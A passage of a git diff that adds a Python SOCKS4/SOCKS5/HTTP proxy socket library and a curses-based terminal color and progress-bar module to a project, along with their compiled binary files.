+ "Network unreachable",
+ "Host unreachable",
+ "Connection refused",
+ "TTL expired",
+ "Command not supported",
+ "Address type not supported",
+ "Unknown error")
+
+_socks5autherrors = ("succeeded",
+ "authentication is required",
+ "all offered authentication methods were rejected",
+ "unknown username or invalid password",
+ "unknown error")
+
+_socks4errors = ("request granted",
+ "request rejected or failed",
+ "request rejected because SOCKS server cannot connect to identd on the client",
+ "request rejected because the client program and identd report different user-ids",
+ "unknown error")
+
+def setdefaultproxy(proxytype=None,addr=None,port=None,rdns=True,username=None,password=None):
+ """setdefaultproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
+ Sets a default proxy which all further socksocket objects will use,
+ unless explicitly changed.
+ """
+ global _defaultproxy
+ _defaultproxy = (proxytype,addr,port,rdns,username,password)
+
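+# A minimal usage sketch (the proxy host/port below are hypothetical):
+#
+#   import socks
+#   s = socks.socksocket()
+#   s.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
+#   s.connect(("www.example.com", 80))
+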
+class socksocket(socket.socket):
+ """socksocket([family[, type[, proto]]]) -> socket object
+
+ Open a SOCKS enabled socket. The parameters are the same as
+ those of the standard socket init. In order for SOCKS to work,
+ you must specify family=AF_INET, type=SOCK_STREAM and proto=0.
+ """
+
+ def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, _sock=None):
+ _orgsocket.__init__(self,family,type,proto,_sock)
+ if _defaultproxy != None:
+ self.__proxy = _defaultproxy
+ else:
+ self.__proxy = (None, None, None, None, None, None)
+ self.__proxysockname = None
+ self.__proxypeername = None
+
+ def __recvall(self, bytes):
+ """__recvall(bytes) -> data
+ Receive EXACTLY the number of bytes requested from the socket.
+ Blocks until the required number of bytes have been received.
+ """
+ data = ""
+ while len(data) < bytes:
+ data = data + self.recv(bytes-len(data))
+ return data
+
+ def setproxy(self,proxytype=None,addr=None,port=None,rdns=True,username=None,password=None):
+ """setproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
+ Sets the proxy to be used.
+ proxytype - The type of the proxy to be used. Three types
+ are supported: PROXY_TYPE_SOCKS4 (including socks4a),
+ PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP
+ addr - The address of the server (IP or DNS).
+ port - The port of the server. Defaults to 1080 for SOCKS
+ servers and 8080 for HTTP proxy servers.
+ rdns - Should DNS queries be preformed on the remote side
+ (rather than the local side). The default is True.
+ Note: This has no effect with SOCKS4 servers.
+ username - Username to authenticate with to the server.
+ The default is no authentication.
+ password - Password to authenticate with to the server.
+ Only relevant when username is also provided.
+ """
+ self.__proxy = (proxytype,addr,port,rdns,username,password)
+
+ def __negotiatesocks5(self,destaddr,destport):
+ """__negotiatesocks5(self,destaddr,destport)
+ Negotiates a connection through a SOCKS5 server.
+ """
+ # First we'll send the authentication packages we support.
+ if (self.__proxy[4]!=None) and (self.__proxy[5]!=None):
+ # The username/password details were supplied to the
+ # setproxy method so we support the USERNAME/PASSWORD
+ # authentication (in addition to the standard none).
+ self.sendall("\x05\x02\x00\x02")
+ else:
+ # No username/password were entered, therefore we
+ # only support connections with no authentication.
+ self.sendall("\x05\x01\x00")
+ # We'll receive the server's response to determine which
+ # method was selected
+ chosenauth = self.__recvall(2)
+ if chosenauth[0] != "\x05":
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ # Check the chosen authentication method
+ if chosenauth[1] == "\x00":
+ # No authentication is required
+ pass
+ elif chosenauth[1] == "\x02":
+ # Okay, we need to perform a basic username/password
+ # authentication.
+ self.sendall("\x01" + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.proxy[5])) + self.__proxy[5])
+ authstat = self.__recvall(2)
+ if authstat[0] != "\x01":
+ # Bad response
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ if authstat[1] != "\x00":
+ # Authentication failed
+ self.close()
+                raise Socks5AuthError((3,_socks5autherrors[3]))
+ # Authentication succeeded
+ else:
+ # Reaching here is always bad
+ self.close()
+ if chosenauth[1] == "\xFF":
+ raise Socks5AuthError((2,_socks5autherrors[2]))
+ else:
+ raise GeneralProxyError((1,_generalerrors[1]))
+ # Now we can request the actual connection
+ req = "\x05\x01\x00"
+ # If the given destination address is an IP address, we'll
+ # use the IPv4 address request even if remote resolving was specified.
+ try:
+ ipaddr = socket.inet_aton(destaddr)
+ req = req + "\x01" + ipaddr
+ except socket.error:
+ # Well it's not an IP number, so it's probably a DNS name.
+ if self.__proxy[3]==True:
+ # Resolve remotely
+ ipaddr = None
+ req = req + "\x03" + chr(len(destaddr)) + destaddr
+ else:
+ # Resolve locally
+ ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
+ req = req + "\x01" + ipaddr
+ req = req + struct.pack(">H",destport)
+ self.sendall(req)
+ # Get the response
+ resp = self.__recvall(4)
+ if resp[0] != "\x05":
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ elif resp[1] != "\x00":
+ # Connection failed
+ self.close()
+            if ord(resp[1])<=8:
+                raise Socks5Error((ord(resp[1]),_socks5errors[ord(resp[1])]))
+            else:
+                raise Socks5Error((9,_socks5errors[9]))
+ # Get the bound address/port
+ elif resp[3] == "\x01":
+ boundaddr = self.__recvall(4)
+ elif resp[3] == "\x03":
+ resp = resp + self.recv(1)
+            boundaddr = self.__recvall(ord(resp[4]))
+ else:
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ boundport = struct.unpack(">H",self.__recvall(2))[0]
+ self.__proxysockname = (boundaddr,boundport)
+ if ipaddr != None:
+ self.__proxypeername = (socket.inet_ntoa(ipaddr),destport)
+ else:
+ self.__proxypeername = (destaddr,destport)
+
+ def getproxysockname(self):
+ """getsockname() -> address info
+ Returns the bound IP address and port number at the proxy.
+ """
+ return self.__proxysockname
+
+ def getproxypeername(self):
+ """getproxypeername() -> address info
+ Returns the IP and port number of the proxy.
+ """
+ return _orgsocket.getpeername(self)
+
+ def getpeername(self):
+ """getpeername() -> address info
+ Returns the IP address and port number of the destination
+ machine (note: getproxypeername returns the proxy)
+ """
+ return self.__proxypeername
+
+ def __negotiatesocks4(self,destaddr,destport):
+ """__negotiatesocks4(self,destaddr,destport)
+ Negotiates a connection through a SOCKS4 server.
+ """
+ # Check if the destination address provided is an IP address
+ rmtrslv = False
+ try:
+ ipaddr = socket.inet_aton(destaddr)
+ except socket.error:
+ # It's a DNS name. Check where it should be resolved.
+ if self.__proxy[3]==True:
+ ipaddr = "\x00\x00\x00\x01"
+ rmtrslv = True
+ else:
+ ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
+ # Construct the request packet
+ req = "\x04\x01" + struct.pack(">H",destport) + ipaddr
+ # The username parameter is considered userid for SOCKS4
+ if self.__proxy[4] != None:
+ req = req + self.__proxy[4]
+ req = req + "\x00"
+ # DNS name if remote resolving is required
+ # NOTE: This is actually an extension to the SOCKS4 protocol
+ # called SOCKS4A and may not be supported in all cases.
+ if rmtrslv==True:
+ req = req + destaddr + "\x00"
+ self.sendall(req)
+ # Get the response from the server
+ resp = self.__recvall(8)
+ if resp[0] != "\x00":
+ # Bad data
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ if resp[1] != "\x5A":
+ # Server returned an error
+ self.close()
+ if ord(resp[1]) in (91,92,93):
+ self.close()
+ raise Socks4Error((ord(resp[1]),_socks4errors[ord(resp[1])-90]))
+ else:
+ raise Socks4Error((94,_socks4errors[4]))
+ # Get the bound address/port
+ self.__proxysockname = (socket.inet_ntoa(resp[4:]),struct.unpack(">H",resp[2:4])[0])
+        # rmtrslv is a boolean; only use ipaddr when it was really resolved.
+        if not rmtrslv:
+ self.__proxypeername = (socket.inet_ntoa(ipaddr),destport)
+ else:
+ self.__proxypeername = (destaddr,destport)
+
+ def __negotiatehttp(self,destaddr,destport):
+ """__negotiatehttp(self,destaddr,destport)
+ Negotiates a connection through an HTTP server.
+ """
+ # If we need to resolve locally, we do this now
+ if self.__proxy[3] == False:
+ addr = socket.gethostbyname(destaddr)
+ else:
+ addr = destaddr
+ self.sendall("CONNECT " + addr + ":" + str(destport) + " HTTP/1.1\r\n" + "Host: " + destaddr + "\r\n\r\n")
+ # We read the response until we get the string "\r\n\r\n"
+ resp = self.recv(1)
+ while resp.find("\r\n\r\n")==-1:
+ resp = resp + self.recv(1)
+ # We just need the first line to check if the connection
+ # was successful
+ statusline = resp.splitlines()[0].split(" ",2)
+ if statusline[0] not in ("HTTP/1.0","HTTP/1.1"):
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ try:
+ statuscode = int(statusline[1])
+ except ValueError:
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ if statuscode != 200:
+ self.close()
+ raise HTTPError((statuscode,statusline[2]))
+ self.__proxysockname = ("0.0.0.0",0)
+ self.__proxypeername = (addr,destport)
+
+ def connect(self,destpair):
+ """connect(self,despair)
+ Connects to the specified destination through a proxy.
+ destpar - A tuple of the IP/DNS address and the port number.
+ (identical to socket's connect).
+ To select the proxy server use setproxy().
+ """
+ # Do a minimal input check first
+        if (not type(destpair) in (list,tuple)) or (len(destpair)<2) or (type(destpair[0])!=str) or (type(destpair[1])!=int):
+ raise GeneralProxyError((5,_generalerrors[5]))
+ if self.__proxy[0] == PROXY_TYPE_SOCKS5:
+ if self.__proxy[2] != None:
+ portnum = self.__proxy[2]
+ else:
+ portnum = 1080
+ _orgsocket.connect(self,(self.__proxy[1],portnum))
+ self.__negotiatesocks5(destpair[0],destpair[1])
+ elif self.__proxy[0] == PROXY_TYPE_SOCKS4:
+ if self.__proxy[2] != None:
+ portnum = self.__proxy[2]
+ else:
+ portnum = 1080
+ _orgsocket.connect(self,(self.__proxy[1],portnum))
+ self.__negotiatesocks4(destpair[0],destpair[1])
+ elif self.__proxy[0] == PROXY_TYPE_HTTP:
+ if self.__proxy[2] != None:
+ portnum = self.__proxy[2]
+ else:
+ portnum = 8080
+ _orgsocket.connect(self,(self.__proxy[1],portnum))
+ self.__negotiatehttp(destpair[0],destpair[1])
+ elif self.__proxy[0] == None:
+ _orgsocket.connect(self,(destpair[0],destpair[1]))
+ else:
+ raise GeneralProxyError((4,_generalerrors[4]))
diff --git a/src/socks.pyc b/src/socks.pyc
new file mode 100644
index 0000000..e68615f
--- /dev/null
+++ b/src/socks.pyc
Binary files differ
diff --git a/src/terminal.py b/src/terminal.py
new file mode 100644
index 0000000..2c43750
--- /dev/null
+++ b/src/terminal.py
@@ -0,0 +1,185 @@
+import sys, re
+
+class TerminalController:
+ """
+ A class that can be used to portably generate formatted output to
+ a terminal.
+
+ `TerminalController` defines a set of instance variables whose
+ values are initialized to the control sequence necessary to
+ perform a given action. These can be simply included in normal
+ output to the terminal:
+
+ >>> term = TerminalController()
+ >>> print 'This is '+term.GREEN+'green'+term.NORMAL
+
+    Alternatively, the `render()` method can be used, which replaces
+ '${action}' with the string required to perform 'action':
+
+ >>> term = TerminalController()
+ >>> print term.render('This is ${GREEN}green${NORMAL}')
+
+ If the terminal doesn't support a given action, then the value of
+ the corresponding instance variable will be set to ''. As a
+ result, the above code will still work on terminals that do not
+ support color, except that their output will not be colored.
+ Also, this means that you can test whether the terminal supports a
+ given action by simply testing the truth value of the
+ corresponding instance variable:
+
+ >>> term = TerminalController()
+ >>> if term.CLEAR_SCREEN:
+    ...     print 'This terminal supports clearing the screen.'
+
+ Finally, if the width and height of the terminal are known, then
+ they will be stored in the `COLS` and `LINES` attributes.
+ """
+ # Cursor movement:
+ BOL = '' #: Move the cursor to the beginning of the line
+ UP = '' #: Move the cursor up one line
+ DOWN = '' #: Move the cursor down one line
+ LEFT = '' #: Move the cursor left one char
+ RIGHT = '' #: Move the cursor right one char
+
+ # Deletion:
+ CLEAR_SCREEN = '' #: Clear the screen and move to home position
+ CLEAR_EOL = '' #: Clear to the end of the line.
+ CLEAR_BOL = '' #: Clear to the beginning of the line.
+ CLEAR_EOS = '' #: Clear to the end of the screen
+
+ # Output modes:
+ BOLD = '' #: Turn on bold mode
+ BLINK = '' #: Turn on blink mode
+ DIM = '' #: Turn on half-bright mode
+ REVERSE = '' #: Turn on reverse-video mode
+ NORMAL = '' #: Turn off all modes
+
+ # Cursor display:
+ HIDE_CURSOR = '' #: Make the cursor invisible
+ SHOW_CURSOR = '' #: Make the cursor visible
+
+ # Terminal size:
+ COLS = None #: Width of the terminal (None for unknown)
+ LINES = None #: Height of the terminal (None for unknown)
+
+ # Foreground colors:
+ BLACK = BLUE = GREEN = CYAN = RED = MAGENTA = YELLOW = WHITE = ''
+
+ # Background colors:
+ BG_BLACK = BG_BLUE = BG_GREEN = BG_CYAN = ''
+ BG_RED = BG_MAGENTA = BG_YELLOW = BG_WHITE = ''
+
+ _STRING_CAPABILITIES = """
+ BOL=cr UP=cuu1 DOWN=cud1 LEFT=cub1 RIGHT=cuf1
+ CLEAR_SCREEN=clear CLEAR_EOL=el CLEAR_BOL=el1 CLEAR_EOS=ed BOLD=bold
+ BLINK=blink DIM=dim REVERSE=rev UNDERLINE=smul NORMAL=sgr0
+    HIDE_CURSOR=civis SHOW_CURSOR=cnorm""".split()
+ _COLORS = """BLACK BLUE GREEN CYAN RED MAGENTA YELLOW WHITE""".split()
+
+ def __init__(self, term_stream=sys.stdout):
+ """
+ Create a `TerminalController` and initialize its attributes
+ with appropriate values for the current terminal.
+ `term_stream` is the stream that will be used for terminal
+ output; if this stream is not a tty, then the terminal is
+ assumed to be a dumb terminal (i.e., have no capabilities).
+ """
+ # Curses isn't available on all platforms
+ try: import curses
+ except: return
+
+ # If the stream isn't a tty, then assume it has no capabilities.
+ if not term_stream.isatty(): return
+
+ # Check the terminal type. If we fail, then assume that the
+ # terminal has no capabilities.
+ try: curses.setupterm()
+ except: return
+
+ # Look up numeric capabilities.
+ self.COLS = curses.tigetnum('cols')
+ self.LINES = curses.tigetnum('lines')
+
+ # Look up string capabilities.
+ for capability in self._STRING_CAPABILITIES:
+ (attrib, cap_name) = capability.split('=')
+ setattr(self, attrib, self._tigetstr(cap_name) or '')
+
+ # Colors
+ set_fg = self._tigetstr('setf')
+ if set_fg:
+ for i,color in zip(range(len(self._COLORS)), self._COLORS):
+ setattr(self, color, curses.tparm(set_fg, i) or '')
+ set_bg = self._tigetstr('setb')
+ if set_bg:
+ for i,color in zip(range(len(self._COLORS)), self._COLORS):
+ setattr(self, 'BG_'+color, curses.tparm(set_bg, i) or '')
+
+ def _tigetstr(self, cap_name):
+ # String capabilities can include "delays" of the form "$<2>".
+ # For any modern terminal, we should be able to just ignore
+ # these, so strip them out.
+ import curses
+ cap = curses.tigetstr(cap_name) or ''
+ return re.sub(r'\$<\d+>[/*]?', '', cap)
+
+ def render(self, template):
+ """
+        Replace each $-substitution in the given template string with
+ the corresponding terminal control string (if it's defined) or
+ '' (if it's not).
+ """
+ return re.sub(r'\$\$|\${\w+}', self._render_sub, template)
+
+ def _render_sub(self, match):
+ s = match.group()
+ if s == '$$': return s
+ else: return getattr(self, s[2:-1])
+
+#######################################################################
+# Example use case: progress bar
+#######################################################################
+
+class ProgressBar:
+ """
+ A 3-line progress bar, which looks like::
+
+ Header
+ 20% [===========----------------------------------]
+ progress message
+
+ The progress bar is colored, if the terminal supports color
+ output; and adjusts to the width of the terminal.
+ """
+ BAR = '%3d%% ${GREEN}[${BOLD}%s%s${NORMAL}${GREEN}]${NORMAL}\n'
+ HEADER = '${BOLD}${CYAN}%s${NORMAL}\n\n'
+
+ def __init__(self, term, header):
+ self.term = term
+ if not (self.term.CLEAR_EOL and self.term.UP and self.term.BOL):
+ raise ValueError("Terminal isn't capable enough -- you "
+ "should use a simpler progress dispaly.")
+ self.width = self.term.COLS or 75
+ self.bar = term.render(self.BAR)
+ self.header = self.term.render(self.HEADER % header.center(self.width))
+ self.cleared = 1 #: true if we haven't drawn the bar yet.
+ self.update(0, '')
+
+ def update(self, percent, message):
+ if self.cleared:
+ sys.stdout.write(self.header)
+ self.cleared = 0
+ n = int((self.width-10)*percent)
+ sys.stdout.write(
+ self.term.BOL + self.term.UP + self.term.CLEAR_EOL +
+ (self.bar % (100*percent, '='*n, '-'*(self.width-10-n))) +
+ self.term.CLEAR_EOL + message.center(self.width))
+
+ def clear(self):
+ if not self.cleared:
+ sys.stdout.write(self.term.BOL + self.term.CLEAR_EOL +
+ self.term.UP + self.term.CLEAR_EOL +
+ self.term.UP + self.term.CLEAR_EOL)
+ self.cleared = 1
+
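+# A quick driver sketch for the progress bar:
+#
+#   import time
+#   term = TerminalController()
+#   pb = ProgressBar(term, 'Working')
+#   for i in range(101):
+#       pb.update(i / 100.0, 'step %d of 100' % i)
+#       time.sleep(0.05)
+#   pb.clear()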
+
diff --git a/src/terminal.pyc b/src/terminal.pyc
new file mode 100644
index 0000000..fe4c802
--- /dev/null
+++ b/src/terminal.pyc
Binary files differ